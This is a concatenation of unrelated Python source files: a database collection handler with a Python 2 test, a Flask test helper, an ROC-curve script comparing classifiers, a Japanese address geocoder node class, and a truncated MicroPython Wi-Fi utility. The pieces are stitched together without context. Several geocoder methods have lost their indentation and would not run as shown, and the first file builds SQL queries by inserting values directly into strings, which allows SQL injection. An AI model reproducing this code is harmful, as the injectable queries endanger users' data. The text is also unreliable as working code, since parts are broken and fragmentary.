        """Feed collection to platform"""
        # Insert only the columns that have values.
        sql_columns = []
        sql_values = []
        for key in ['name', 'creator_id']:
            if self._collection[key]:
                sql_columns.append(key)
                sql_values.append("'%s'" % self._collection[key])
        q = "INSERT INTO collections (%s) VALUES (%s);" \
            % (','.join(sql_columns), ','.join(sql_values))
        query = Query(q)
        try:
            self._collection['id'] = query.result[0]['INSERT_ID']
        except KeyError:
            return False
        # Attach all listed assets to the new collection.
        changes = [(x,self._collection['id'])
                   for x in self._collection['assets']]
        ok = self.__update_assets (changes)
        if ok:
            acl = ACL(self.params)
            acl.set_default_collection_acl(self._collection)
            return True
        # Asset update failed: remove the just-inserted collection row.
        q = "DELETE FROM collections WHERE id = %s;" %\
            (self._collection['id'])
        query = Query(q)
        return False
    def update (self):
        """Update a collection"""
        col_id = self._collection['id']
        q = "UPDATE collections SET name = '%s' "\
            "WHERE id = %s;" % (self._collection['name'], col_id)
        if not query_check_success (q):
            return False
        # Reconcile membership: attach new assets, detach removed ones.
        old_assets = Collection.Collection(col_id)['assets']
        new_assets = self._collection['assets']
        # Assets no longer in the collection (detached with col_id=None).
        mod_assets = [x for x in old_assets if x not in new_assets]
        changes = [(x, col_id) for x in new_assets]
        changes += [(x, None) for x in mod_assets]
        ok = self.__update_assets (changes)
        if not ok:
            return False
        return True
    def delete (self):
        """Delete the collection and all its assets (or their
        attachments if deletion is not possible."""
        changes = []
        for asset_id in self._collection['assets']:
            a = Asset.Asset (asset_id)
            oa = OpAsset.OpAsset(a)
            ret = oa.delete()
            # 'partial' deletions leave the asset row; detach it instead.
            if ret['type'] == 'partial' and ret['ret'] == True:
                changes.append((asset_id, None))
            if ret['ret'] == False:
                # Abort: detach whatever was partially deleted so far.
                self.__update_assets (changes)
                return False
        q = "DELETE FROM collections WHERE id = '%s';" % self._collection['id']
        if not query_check_success (q):
            return False
        return True
def test():
    """Smoke-test OpCollection against a live database (Python 2).

    Usage: OpCollection.py <username> <sample_asset_id>
    Creates a throw-away asset and collection, then exercises
    add/update/delete, asserting after each step.
    """
    import sys
    import OpLookup
    import Auth
    import Role
    try:
        username = sys.argv[1]
        asset_id = int (sys.argv[2])
        asset = Asset.Asset (asset_id)
        user = Auth.get_user(username)
        roles = Role.get_user_roles (username)
        params = { 'roles': roles, 'user_id': user['id']}
    except IndexError:
        print 'Required test parameters: user sample_asset_id'
        sys.exit(1)
    # Create asset for testing
    new_asset = Asset.Asset ()
    new_asset._db = asset._db
    new_asset._tags = asset._tags
    # id() of the in-memory object serves as a unique marker so the
    # asset can be looked up again after insertion.
    flag = id (new_asset)
    new_asset['title'] = flag
    oa = OpAsset.OpAsset (new_asset, params)
    ret = oa.add()
    assert ret == True
    print '#1 OpCollection: Creation of test asset OK'
    ol = OpLookup.OpLookup ()
    new_asset_id = ol({'title': flag})[0]
    new_asset = Asset.Asset (new_asset_id)
    oa = OpAsset.OpAsset (new_asset, params)
    assert oa and int(new_asset['title']) == int(flag)
    print '#2 OpCollection: Retrieval of test asset OK'
    # Build a collection containing the test asset.
    test = Collection.Collection ()
    flag = str(id(test))
    test._db['name'] = flag
    test._db['creator_id'] = user['id']
    test['assets'] = [new_asset['id']]
    oc = OpCollection (test, debug_params = params)
    assert oc
    print '#3 OpCollection (%d): OK' % test['id']
    ret = oc.add()
    assert ret == True
    print '#4 OpCollection.add (): OK'
    new = Collection.Collection (name_collection = test['name'])
    oc = OpCollection (new, debug_params = params)
    assert new['name'] == test['name']
    print '#5 OpCollection (%d): Retrieval after creation OK' % new['id']
    # Rename the collection and verify the update round-trips.
    new['name'] = flag*2
    ret = oc.update()
    assert ret == True
    print '#6 OpCollection.update (): Modification OK'
    new = Collection.Collection (name_collection = new['name'])
    oc = OpCollection (new, debug_params=params)
    assert new['name'] == flag*2
    print '#7 OpCollection (%d): Retrieval after modification OK' % new['id']
    ret = oc.delete()
    assert ret == True
    print '#8 OpCollection.delete(): Deletion OK'
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2019-06-06 14:36
# @Author : Vassago
# @File : common.py
# @Software: PyCharm
import json
import logging
from unittest import TestCase
from app.config import base_config
from app.app_runner import create_app as _create_app
LOG = logging.getLogger(__name__)
class BaseTestCase(TestCase):
    """Flask test-client helpers: one thin wrapper per HTTP verb.

    Each wrapper merges the default headers with per-request ones, logs
    error responses and, when check_status is True, fails the test on
    HTTP errors. All wrappers return (status_code, decoded_json).
    """

    def get_before_run_test_app(self):
        """Create the Flask app lazily and reuse it across calls."""
        if not hasattr(self, 'app') or not self.app:
            self.app = _create_app()
        return self.app

    def create_test_app(self):
        """Build the app and a test client with JSON defaults."""
        # NOTE: test-database create/drop setup is intentionally not
        # performed here (see repository history).
        self.get_before_run_test_app()
        self.app.config['JSONIFY_PRETTYPRINT_REGULAR'] = False
        self.app_client = self.app.test_client()
        self.headers = {'content_type': 'application/json'}

    def _merged_headers(self, headers):
        """Return the default headers overlaid with per-request ones."""
        merged = {}
        merged.update(self.headers)
        merged.update(headers or {})
        return merged

    def _check_response(self, rv, check_status, ignore_404=True):
        """Log an error response; raise a test failure if check_status."""
        if rv.status_code >= 400 and not (ignore_404 and rv.status_code == 404):
            LOG.error("request error %s", json.loads(rv.data))
            if check_status:
                raise self.failureException("http error: {}".format(rv.data))

    def get(self, url, data=None, headers=None, check_status=True, query_string=None):
        """GET `url`; return (status_code, decoded JSON body)."""
        rv = self.app_client.get(url, data=data,
                                 headers=self._merged_headers(headers),
                                 query_string=query_string)
        self._check_response(rv, check_status)
        return rv.status_code, json.loads(rv.data)

    def post(self, url, data=None, headers=None, check_status=True):
        """POST JSON `data` to `url`; return (status_code, decoded body)."""
        # Serialize the payload; an empty payload is sent as an empty dict.
        data = json.dumps(data) if data else {}
        rv = self.app_client.post(url, data=data, follow_redirects=True,
                                  content_type='application/json',
                                  headers=self._merged_headers(headers))
        # Unlike the other verbs, POST also treats 404 as an error
        # (behavior preserved from the original implementation).
        self._check_response(rv, check_status, ignore_404=False)
        return rv.status_code, json.loads(rv.data)

    def patch(self, url, data=None, headers=None, check_status=True):
        """PATCH JSON `data` to `url`; return (status_code, decoded body)."""
        rv = self.app_client.patch(url, data=json.dumps(data),
                                   follow_redirects=True,
                                   content_type='application/json',
                                   headers=self._merged_headers(headers))
        self._check_response(rv, check_status)
        return rv.status_code, json.loads(rv.data)

    def put(self, url, data=None, headers=None, check_status=True):
        """PUT JSON `data` to `url`; return (status_code, decoded body)."""
        rv = self.app_client.put(url, data=json.dumps(data),
                                 follow_redirects=True,
                                 content_type='application/json',
                                 headers=self._merged_headers(headers))
        self._check_response(rv, check_status)
        return rv.status_code, json.loads(rv.data)

    def delete(self, url, headers=None, check_status=True):
        """DELETE `url`; return (status_code, decoded body or None)."""
        rv = self.app_client.delete(url, follow_redirects=True,
                                    content_type='application/json',
                                    headers=self._merged_headers(headers))
        self._check_response(rv, check_status)
        # DELETE responses may have an empty body.
        json_data = json.loads(rv.data) if rv.data else None
        return rv.status_code, json_data
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Author: <NAME>
Email: <EMAIL>
ROC curve and AUC for Neurochaos Learning, SVM and Random Forest
"""
import os
import numpy as np
from sklearn.metrics import confusion_matrix, ConfusionMatrixDisplay
import matplotlib.pyplot as plt
from pretty_confusion_matrix import pp_matrix_from_data
# Compare Neurochaos Learning (NL), SVM and Random Forest on a five-class
# genome classification task: confusion matrices, micro-averaged ROC/AUC,
# and macro-averaged precision/recall/F1.
DATA_NAME = ['Sars_cov_2.genomes' , 'Coronaviridae.genomes', 'Metapneumovirus.genomes', 'Rhinovirus.genomes', 'Influenza.genomes' ]
label_list = ['class-0', 'class-1', 'class-2', 'class-3', 'class-4' ]
classification_type = 'five_class'
path = os.getcwd()

# Result folders for the three classifiers, in plotting order: NL, SVM, RF.
general_result_path = []
result_path_nl = path + '/NEUROCHAOS-RESULTS/' + classification_type + '/CROSS_VALIDATION/'
result_path_svm = path + '/SA-TUNING/RESULTS/SVM/'
result_path_rf = path + '/SA-TUNING/RESULTS/RANDOM_FOREST/'
general_result_path.append(result_path_nl)
general_result_path.append(result_path_svm)
general_result_path.append(result_path_rf)

# Imports hoisted out of the per-classifier loop.
from sklearn.metrics import roc_curve, auc
from sklearn.metrics import roc_auc_score
from sklearn.preprocessing import label_binarize
from sklearn.metrics import classification_report
from sklearn.metrics import precision_score, recall_score, f1_score

AUC_FINAL_MICRO = []
TPR_FINAL_MICRO = []
FPR_FINAL_MICRO = []
for num_len in range(0, len(general_result_path)):
    true_test_label = np.load(general_result_path[num_len] + 'true_test_label.npy')
    pred_test_label = np.load(general_result_path[num_len] + 'pred_test_label.npy')
    pp_matrix_from_data(true_test_label, pred_test_label )
    cm = confusion_matrix(true_test_label, pred_test_label )
    disp = ConfusionMatrixDisplay(confusion_matrix=cm, display_labels=label_list)
    disp.plot()
    plt.tight_layout()
    # plt.savefig(result_path+"loocv_cm_chaosfex_svm.jpg", format='jpg', dpi=300)
    # plt.savefig(result_path+"loocv_cm_chaosfex_svm.eps", format='eps', dpi=300)

    ## ROC Curve
    y_score_mat = np.load(general_result_path[num_len]+ 'y_score_mat.npy')
    y_test = label_binarize(true_test_label, classes=[0, 1, 2, 3, 4])
    n_classes = y_test.shape[1]

    # Compute ROC curve and ROC area for each class
    fpr = dict()
    tpr = dict()
    roc_auc = dict()
    for i in range(n_classes):
        fpr[i], tpr[i], _ = roc_curve(y_test[:, i], y_score_mat[:, i])
        roc_auc[i] = auc(fpr[i], tpr[i])

    # Compute micro-average ROC curve and ROC area
    fpr["micro"], tpr["micro"], _ = roc_curve(y_test.ravel(), y_score_mat.ravel())
    roc_auc["micro"] = auc(fpr["micro"], tpr["micro"])
    TPR_FINAL_MICRO.append(tpr["micro"])
    FPR_FINAL_MICRO.append(fpr["micro"])
    AUC_FINAL_MICRO.append(roc_auc["micro"])

plt.figure(figsize=(15, 10))
lw = 3
# FIX: the legend previously hardcoded "AUC = 0.99" for all three curves;
# use the micro-averaged AUC actually computed for each classifier.
plt.plot(FPR_FINAL_MICRO[0], TPR_FINAL_MICRO[0], color="red", lw=lw, label="ROC curve for NL (AUC = %0.2f)" % AUC_FINAL_MICRO[0] ,)
plt.plot(FPR_FINAL_MICRO[1], TPR_FINAL_MICRO[1], color="blue", lw=lw, label="ROC curve for SVM (AUC = %0.2f)" % AUC_FINAL_MICRO[1] ,)
plt.plot(FPR_FINAL_MICRO[2], TPR_FINAL_MICRO[2], color="green", lw=lw, label="ROC curve for RF (AUC = %0.2f)" % AUC_FINAL_MICRO[2] ,)
plt.plot([0, 1], [0, 1], color="navy", lw=lw, linestyle="--")
plt.xlim([-0.05, 1.0])
plt.ylim([0.0, 1.05])
plt.xticks(fontsize=45)
plt.yticks(fontsize=45)
plt.xlabel("False Positive Rate", fontsize = 40)
plt.ylabel("True Positive Rate", fontsize = 40)
# plt.title("Receiver operating characteristic example")
plt.legend(loc="lower right",fontsize=30)
plt.grid(True)
plt.tight_layout()
plt.savefig(result_path_nl+"roc_final_multiclass.jpg", format='jpg', dpi=300)
plt.savefig(result_path_nl+"roc_final_multiclass.eps", format='eps', dpi=300)
plt.show()

# Classification Metrics
# NOTE: these use true/pred labels from the LAST loop iteration only
# (i.e. the Random Forest results), preserving the original behavior.
print(classification_report(true_test_label, pred_test_label , target_names=label_list))
precision = precision_score(true_test_label, pred_test_label, average='macro')
recall = recall_score(true_test_label, pred_test_label, average='macro')
fscore = f1_score(true_test_label, pred_test_label, average='macro')
print("Precision = ", precision)
print("Recall = ", recall)
print("F1-score = ", fscore)
|
<reponame>t-sagara/jageocoder
from functools import lru_cache
import logging
import re
from typing import List, Optional, Union
from sqlalchemy import Column, ForeignKey, Integer, Float, String, Text
from sqlalchemy import or_
from sqlalchemy.orm import deferred
from sqlalchemy.orm import backref, relationship
from jageocoder.address import AddressLevel
from jageocoder.base import Base
from jageocoder.itaiji import converter as itaiji_converter
from jageocoder.result import Result
from jageocoder.strlib import strlib
logger = logging.getLogger(__name__)
class AddressNode(Base):
    """
    The address-node structure stored in 'node' table.

    Attributes
    ----------
    id : int
        The key identifier that is automatically sequentially numbered.
    name : str
        The name of the address element, such as '東京都' or '新宿区'
    name_index : str
        The standardized string for indexing created from its name.
    x : float
        X-coordinate value. (Longitude)
    y : float
        Y-coordinate value. (Latitude)
    level : int
        The level of the address element.
        The meaning of each value is defined by
        jageocoder.address.AddressLevel (prefecture, city, ward, aza, ...).
    note : string
        Note or comment.
    parent_id : int
        The id of the parent node.
    children : list of AddressNode
        The child nodes.
    """
    __tablename__ = 'node'
    id = Column(Integer, primary_key=True)
    # 'name', coordinates and 'note' are deferred: loaded only on access.
    name = deferred(Column(String(256), nullable=False))
    name_index = Column(String(256), nullable=False)
    x = deferred(Column(Float, nullable=True))
    y = deferred(Column(Float, nullable=True))
    level = Column(Integer, nullable=True)
    note = deferred(Column(Text, nullable=True))
    parent_id = Column(Integer, ForeignKey('node.id'), nullable=True)
    # Self-referential one-to-many: the 'parent' backref gives the upper
    # node; lazy="dynamic" makes 'children' a filterable query object.
    children = relationship(
        "AddressNode",
        cascade="all",
        backref=backref("parent", remote_side="AddressNode.id"),
        lazy="dynamic",
    )
    def __init__(self, *args, **kwargs):
        """
        The initializer of the node.

        In addition to the initialization of the record,
        the name_index is also created.
        """
        super().__init__(*args, **kwargs)
        # Basic attributes
        self.name = kwargs.get('name', '')
        # Set extended attributes (x/y, level, note; accepts lon/lat aliases)
        self.set_attributes(**kwargs)
        # For indexing: standardized form of the name (itaiji conversion)
        self.name_index = itaiji_converter.standardize(self.name)
        # Relations
        self.parent_id = kwargs.get('parent_id', None)
def set_attributes(self, **kwargs):
"""
Set attributes of this node by kwargs values.
'name' can't be modified.
"""
self.x = kwargs.get('x', kwargs.get('lon'))
self.y = kwargs.get('y', kwargs.get('lat'))
self.level = kwargs.get('level')
self.note = kwargs.get('note', None)
    def add_child(self, child):
        """
        Add a node as a child of this node.

        Parameter
        ---------
        child : AddressNode
            The node that will be a child node.
        """
        self.children.append(child)
    def add_to_parent(self, parent):
        """
        Add this node as a child of an other node.

        Parameter
        ---------
        parent : AddressNode
            The node that will be the parent.
        """
        # 'parent' is the backref of the self-referential 'children' relation.
        self.parent = parent
    def get_child(self, target_name):
        """
        Get a child node with the specified name.

        Parameter
        ---------
        target_name : str
            The name (or standardized name) of the target node.

        Return
        ------
        Returns the relevant node if it is found,
        or None if it is not.
        """
        # Matches either the display name or its standardized index form.
        return self.children.filter(or_(
            AddressNode.name == target_name,
            AddressNode.name_index == target_name
        )).one_or_none()
    @lru_cache(maxsize=512)
    def search_child_with_criteria(self, pattern: str,
                                   max_level: Optional[int] = None):
        """
        Return a query over children whose name_index matches `pattern`
        (SQL LIKE), optionally restricted to level <= max_level,
        ordered by id.

        NOTE(review): lru_cache on an instance method keys on `self` and
        keeps each cached node alive for the cache's lifetime (ruff B019);
        confirm this memory trade-off is intentional.
        """
        conds = []
        conds.append(AddressNode.name_index.like(pattern))
        logger.debug("  conds: name_index LIKE '{}'".format(pattern))
        if max_level is not None:
            conds.append(AddressNode.level <= max_level)
            logger.debug("  and level <= {}".format(max_level))
        filtered_children = self.children.filter(*conds).order_by(
            AddressNode.id)
        return filtered_children
def search_recursive(
self, index: str,
processed_nodes: Optional[List['AddressNode']] = None,
aza_skip: Union[str, bool, None] = None) -> List[Result]:
"""
Search nodes recursively that match the specified address notation.
Parameter
---------
index : str
The standardized address notation.
processed_nodes: List of AddressNode, optional
List of nodes that have already been processed
by TRIE search results
aza_skip: str, bool, optional
Specifies how to skip aza-names.
- Set to 'auto' or None to make the decision automatically
- Set to 'off' or False to not skip
- Set to 'on' or True to always skip
Return
------
A list of relevant AddressNode.
"""
l_optional_prefix = itaiji_converter.check_optional_prefixes(index)
optional_prefix = index[0: l_optional_prefix]
index = index[l_optional_prefix:]
if aza_skip in (None, ''):
aza_skip = 'auto'
elif aza_skip in (True, 'enable'):
aza_skip = 'on'
elif aza_skip in (False, 'disable'):
aza_skip = 'off'
logger.debug("node:{}, index:{}, optional_prefix:{}".format(
self, index, optional_prefix))
if len(index) == 0:
return [Result(self, optional_prefix, 0)]
max_level = None
v = strlib.get_number(index)
if v['i'] > 0:
# If it starts with a number,
# look for a node that matches the numeric part exactly.
substr = '{}.%'.format(v['n'])
else:
# If it starts with not a number,
# look for a node with a maching first letter.
substr = index[0:1] + '%'
if '字' in optional_prefix:
max_level = AddressLevel.AZA
filtered_children = self.search_child_with_criteria(
pattern=substr, max_level=max_level)
# Check if the index begins with an extra character of
# the current node.
if filtered_children.count() == 0 and \
index[0] in itaiji_converter.extra_characters:
logger.debug("Beginning with an extra character: {}".format(
index[0]))
candidates = self.search_recursive(
index[1:], processed_nodes, aza_skip)
if len(candidates) > 0:
new_candidates = []
for candidate in candidates:
new_candidate = Result(
candidate.node,
index[0] + candidate.matched,
l_optional_prefix + candidate.nchars)
new_candidates.append(new_candidate)
return new_candidates
return []
if logger.isEnabledFor(logging.DEBUG):
msg = 'No candidates. Children are; {}'.format(
','.join([x.name for x in self.children]))
logger.debug(msg)
candidates = []
for child in filtered_children:
if child in processed_nodes or []:
logger.debug("-> skipped; {}({})".format(
child.name, child.id))
continue
logger.debug("-> comparing; {}".format(child.name_index))
new_candidates = self._get_candidates_from_child(
child=child,
index=index,
optional_prefix=optional_prefix,
processed_nodes=processed_nodes,
aza_skip=aza_skip)
if len(new_candidates) > 0:
candidates += new_candidates
if self.level == AddressLevel.WARD and self.parent.name == '京都市':
# Street name (通り名) support in Kyoto City
# If a matching part of the search string is found in the
# child nodes, the part before the name is skipped
# as a street name.
for child in self.children:
pos = index.find(child.name_index)
if pos > 0:
offset = pos + len(child.name_index)
rest_index = index[offset:]
logger.debug(
"child:{} match {} chars".format(child, offset))
for cand in child.search_recursive(
rest_index,
processed_nodes, aza_skip):
candidates.append(
Result(cand[0],
optional_prefix +
index[0: offset] + cand[1],
l_optional_prefix +
len(child.name_index) + len(cand[1])
))
# Search for subnodes with queries excludes Aza-name candidates
if aza_skip == 'on' or \
(aza_skip == 'auto' and
self._is_aza_omission_target(processed_nodes)):
msg = "Checking Aza-name, current_node:{}, processed:{}"
logger.debug(msg.format(self, processed_nodes))
aza_positions = itaiji_converter.optional_aza_len(
index, 0)
if len(aza_positions) > 0:
for azalen in aza_positions:
msg = '"{}" in index "{}" can be optional.'
logger.debug(msg.format(index[:azalen], index))
# Note: Disable 'aza_skip' here not to perform
# repeated skip processing.
sub_candidates = self.search_recursive(
index[azalen:],
processed_nodes, aza_skip='off')
if sub_candidates[0].matched == '':
continue
for cand in sub_candidates:
if cand.node.level < AddressLevel.BLOCK and \
cand.node.name_index not in \
itaiji_converter.chiban_heads:
logger.debug("{} is ignored".format(
cand.node.name))
continue
candidates.append(Result(
cand.node,
optional_prefix +
index[0:azalen] + cand.matched,
l_optional_prefix + cand.nchars))
if len(candidates) == 0:
candidates = [Result(self, '', 0)]
logger.debug("node:{} returns {}".format(self.name, candidates))
return candidates
    def _get_candidates_from_child(
            self, child: 'AddressNode',
            index: str, optional_prefix: str,
            processed_nodes: List['AddressNode'],
            aza_skip: str) -> list:
        """
        Get candidates from the child.

        Parameters
        ----------
        child: AddressNode
            The starting child node.
        index: str
            Standardized query string. Numeric characters are kept as
            original notation.
        optional_prefix: str
            The option string that preceded the string passed by index.
        aza_skip: str
            Specifies how to skip aza-names.
            Options are 'auto', 'off', and 'on'

        Returns
        -------
        list
            The list of candidates.
            Each element of the array has the matched AddressNode
            as the first element and the matched string
            as the second element.
        """
        match_len = itaiji_converter.match_len(index, child.name_index)
        if match_len == 0:
            # No direct match: try again with optional postfixes removed.
            l_optional_postfix = itaiji_converter.check_optional_postfixes(
                child.name_index, child.level)
            if l_optional_postfix > 0:
                # In case the index string of the child node with optional
                # postfixes removed is completely included in the beginning
                # of the search string.
                # ex. index='2.-8.', child.name_index='2.番' ('番' is a postfix)
                optional_postfix = child.name_index[-l_optional_postfix:]
                alt_child_index = child.name_index[0: -l_optional_postfix]
                logger.debug(
                    "child:{} has optional postfix {}".format(
                        child, optional_postfix))
                match_len = itaiji_converter.match_len(
                    index, alt_child_index, removed_postfix=optional_postfix)
                if match_len < len(index) and index[match_len] in '-ノ':
                    # Also consume a following separator character.
                    match_len += 1

        if match_len == 0 and child.name_index.endswith('.条'):
            # Support for Sapporo City and other cities that use
            # "北3西1" instead of "北3条西1丁目".
            alt_child_index = child.name_index.replace('条', '', 1)
            logger.debug("child:{} ends with '.条'".format(child))
            match_len = itaiji_converter.match_len(index, alt_child_index)

        if match_len == 0:
            logger.debug("{} doesn't match".format(child.name))
            return []

        # Recurse into the child with the unmatched remainder of the query.
        candidates = []
        offset = match_len
        rest_index = index[offset:]
        l_optional_prefix = len(optional_prefix)
        logger.debug("child:{} match {} chars".format(child, offset))
        for cand in child.search_recursive(
                index=rest_index,
                processed_nodes=processed_nodes,
                aza_skip=aza_skip):
            candidates.append(Result(
                cand.node,
                optional_prefix + index[0:match_len] + cand.matched,
                l_optional_prefix + match_len + cand.nchars))

        return candidates
    def _is_aza_omission_target(
            self, processed_nodes: List['AddressNode']) -> bool:
        """
        Determine if this node is a target of aza-name omission.

        Parameters
        ----------
        processed_nodes: List of AddressNode
            List of nodes that have already been processed
            by TRIE search results

        Returns
        -------
        bool
            True if this node is a target of aza-name ommission.
            Otherwise False.

        Notes
        -----
        Sibling and parent nodes of nodes whose names match in TRIE
        should not look for nodes that omit the aza-names.
        """
        # Only city-to-aza level nodes can omit aza-names at all.
        if self.level < AddressLevel.CITY or \
                self.level > AddressLevel.AZA:
            return False

        # If a sibling or a child was already matched via TRIE, skipping
        # aza-names here would shadow that better match.
        for node in processed_nodes or []:
            if node.parent_id == self.parent_id:
                logger.debug("A sibling node {} had been selected".format(
                    node.name))
                return False
            elif node.parent_id == self.id:
                logger.debug("A child node {} had been selected".format(
                    node.name))
                return False

        if self.level in (AddressLevel.CITY, AddressLevel.WARD):
            return True

        # At aza level: every aza-or-lower child must look like a chiban
        # (parcel-number) head, otherwise skipping would lose structure.
        aza_children = self.children.filter(
            AddressNode.level <= AddressLevel.AZA)
        for child in aza_children:
            if child.name_index not in itaiji_converter.chiban_heads:
                logger.debug(("The child-node {} is higher than Aza "
                              "(can't skip aza-names)").format(child.name))
                return False

        return True
def save_recursive(self, session):
"""
Add the node to the database recursively.
Parameters
----------
session : sqlalchemy.orm.Session
The database session for executing SQL queries.
"""
session.add(self)
for c in self.children:
c.save_recursive(session)
def as_dict(self):
"""
Return the dict notation of the node.
"""
return {
"id": self.id,
"name": self.name,
"x": self.x,
"y": self.y,
"level": self.level,
"note": self.note,
"fullname": self.get_fullname(),
}
    def get_fullname(self):
        """
        Returns the list of element names composing the address,
        starting with the name of the prefecture.
        (The root node itself is excluded.)
        """
        names = []
        cur_node = self
        # Walk up to (but not including) the root node.
        while cur_node.parent:
            names.insert(0, cur_node.name)
            cur_node = cur_node.parent
        return names
def get_parent_list(self):
"""
Returns a complete node list starting with the prefecture.
"""
nodes = []
cur_node = self
while cur_node.parent:
nodes.insert(0, cur_node)
cur_node = cur_node.parent
return nodes
    def get_nodes_by_level(self):
        """
        The function returns an array of this node and its upper nodes.
        The Nth node of the array contains the node corresponding
        to address level N.
        If there is no element corresponding to level N, None is stored.

        Example
        -------
        >>> import jageocoder
        >>> jageocoder.init()
        >>> node = jageocoder.searchNode('多摩市落合1-15')[0][0]
        >>> [str(x) for x in node.get_nodes_by_level()]
        ['None', '[11460206:東京都(139.69164,35.6895)1(jisx0401:13)]', 'None', '[12063501:多摩市(139.446366,35.636959)3(jisx0402:13224)]', 'None',
        '[12065382:落合(139.427097,35.624877)5(None)]', '[12065383:一丁目(139.427097,35.624877)6(None)]', '[12065389:15番地(139.428969,35.625779)7(None)]']
        """
        # Slot per level; later (lower) nodes fill higher indexes.
        result = [None] * (self.level + 1)
        cur_node = self
        while cur_node.parent:
            result[cur_node.level] = cur_node
            cur_node = cur_node.parent
        return result
    def __str__(self):
        # Compact one-line form: [id:name(x,y)level(note)]
        return '[{}:{}({},{}){}({})]'.format(
            self.id, self.name, self.x, self.y, self.level, str(self.note))
def __repr__(self):
    """Chain representation from the prefecture down to this node."""
    parts = []
    node = self
    while node.parent:
        parts.append(str(node))
        node = node.parent
    return '>'.join(reversed(parts))
def retrieve_upper_node(self, target_levels: List[int]):
    """
    Search this node and its ancestors for the first node whose
    address level is one of ``target_levels``.

    Returns the matching node, or None when neither this node nor any
    ancestor matches.
    """
    node = self
    while node.level not in target_levels and node.parent:
        node = node.parent
    return node if node.level in target_levels else None
def get_pref_name(self) -> str:
    """
    Return the name of the prefecture containing this node,
    or '' when no prefecture-level ancestor exists.
    """
    pref = self.retrieve_upper_node([AddressLevel.PREF])
    return '' if pref is None else pref.name
def get_pref_jiscode(self) -> str:
    """
    Return the JIS X 0401 (2-digit prefecture) code recorded in the
    note of the prefecture-level ancestor, or '' when unavailable.
    """
    pref = self.retrieve_upper_node([AddressLevel.PREF])
    if pref is None or pref.note is None:
        return ''
    match = re.search(r'jisx0401:(\d{2})', pref.note)
    return match.group(1) if match else ''
def get_pref_local_authority_code(self) -> str:
    """
    Return the 6-digit local-authority code (地方公共団体コード) of
    the prefecture containing this node, or '' when unknown.
    """
    code = self.get_pref_jiscode()
    return self._local_authority_code(code + '000') if code else ''
def get_city_name(self) -> str:
    """
    Return the name of the city (or ward) containing this node,
    or '' when no city/ward-level ancestor exists.
    """
    city = self.retrieve_upper_node([
        AddressLevel.CITY, AddressLevel.WARD])
    return '' if city is None else city.name
def get_city_jiscode(self) -> str:
    """
    Return the JIS X 0402 (5-digit municipality) code recorded in the
    note of the city/ward-level ancestor, or '' when unavailable.
    """
    city = self.retrieve_upper_node([
        AddressLevel.CITY, AddressLevel.WARD])
    if city is None or city.note is None:
        return ''
    match = re.search(r'jisx0402:(\d{5})', city.note)
    return match.group(1) if match else ''
def get_city_local_authority_code(self) -> str:
    """
    Return the 6-digit local-authority code (地方公共団体コード) of
    the city containing this node, or '' when unknown.
    """
    code = self.get_city_jiscode()
    return self._local_authority_code(code) if code else ''
def _local_authority_code(self, orig_code: str) -> str:
    """
    Append the check digit to a 5-digit JIS code, producing the 6-digit
    local-authority code (地方公共団体コード).

    Per the MIC definition, the five digits are multiplied by the
    weights 6,5,4,3,2 and summed; the check digit is 11 minus the
    remainder of (sum mod 11), keeping only the last digit when the
    result is 10 or 11.
    https://www.soumu.go.jp/main_content/000137948.pdf

    Raises
    ------
    RuntimeError
        If orig_code is not a 5-character string.
    """
    if len(orig_code) != 5:
        raise RuntimeError('The original code must be a 5-digit string.')
    weights = (6, 5, 4, 3, 2)
    total = sum(int(digit) * w for digit, w in zip(orig_code, weights))
    # Taking only the last digit maps 10 -> '0' and 11 -> '1'.  The
    # previous `if total < 11` branch skipped this truncation, so a
    # weighted sum of 0 or 1 produced a two-character "digit" and an
    # invalid 7-character code.  (Also renamed `sum` -> `total` to stop
    # shadowing the builtin.)
    checkdigit = str(11 - (total % 11))[-1]
    return orig_code + checkdigit
def get_postcode(self) -> str:
    """
    Return the 7-digit postcode recorded in the note of this node or
    its nearest ancestor, or '' when unavailable.

    Note: the upward search stops at the first node that has any note
    (even one without a postcode), and gives up once it reaches county
    level or above.
    """
    node = self
    while node.level > AddressLevel.COUNTY:
        if node.note:
            match = re.search(r'postcode:(\d{7})', node.note)
            return match.group(1) if match else ''
        node = node.parent
    return ''
def get_gsimap_link(self) -> str:
    """
    Return a GSI map URL centered on this node, or '' when the level
    or coordinates are unknown.
    ex. https://maps.gsi.go.jp/#13/35.713556/139.750385/
    """
    if None in (self.level, self.x, self.y):
        return ''
    # Zoom is derived from the address level (finer level -> closer zoom).
    return 'https://maps.gsi.go.jp/#{z:d}/{lat:.6f}/{lon:.6f}/'.format(
        z=9 + self.level, lat=self.y, lon=self.x)
def get_googlemap_link(self) -> str:
    """
    Return a Google Maps URL centered on this node, or '' when the
    level or coordinates are unknown.
    ex. https://maps.google.com/maps?q=24.197611,120.780512&z=18
    """
    if None in (self.level, self.x, self.y):
        return ''
    # Zoom is derived from the address level, mirroring get_gsimap_link.
    return 'https://maps.google.com/maps?q={lat:.6f},{lon:.6f}&z={z:d}'.format(
        z=9 + self.level, lat=self.y, lon=self.x)
|
import json
import network
import webrepl
from machine import Pin
import machine
import time
class WIFI_UTIL:
    """Wi-Fi helper for MicroPython boards.

    Manages station (STA) and access-point (AP) modes, persists their
    credentials in small JSON config files, and arms a push-button
    interrupt that toggles AP mode (the board reboots to apply it).

    NOTE(review): the original nesting was lost in the source dump; the
    structure of toggle_AP_usb below is reconstructed and should be
    verified against the device behavior.
    """

    def __init__(self, AP_FLAG=27, SIGNAL=33, LED=13, silent=True):
        """Configure pins and config-file names.

        AP_FLAG, SIGNAL, LED are GPIO numbers; silent suppresses
        console chatter.
        """
        self.AP_flag = Pin(AP_FLAG, Pin.IN)
        time.sleep(2)
        self.button = None
        self.butpin = AP_FLAG
        self.ap = network.WLAN(network.AP_IF)
        # LED
        self.led = Pin(LED, Pin.OUT)
        # SIGNAL -- was hard-coded to Pin(33), silently ignoring the
        # SIGNAL argument; now honors the parameter (default unchanged).
        self.sig = Pin(SIGNAL, Pin.OUT)
        self.sig.value(0)
        # Guard so the IRQ handler is not re-entered.
        self.irq_busy = False
        # STA CONFIG FILE
        self.STA_FILE = 'wifi_.config'
        # AP CONFIG FILE
        self.AP_FILE = 'ap_.config'
        self.silent = silent
        if not self.silent:
            print('WLAN UTIL INITIATED')

    def toggle_AP_usb(self, x):
        """IRQ handler: toggle AP mode and reset the board to apply it.

        `x` is the Pin instance supplied by the IRQ machinery (unused).
        """
        if self.irq_busy:
            return
        else:
            self.irq_busy = True
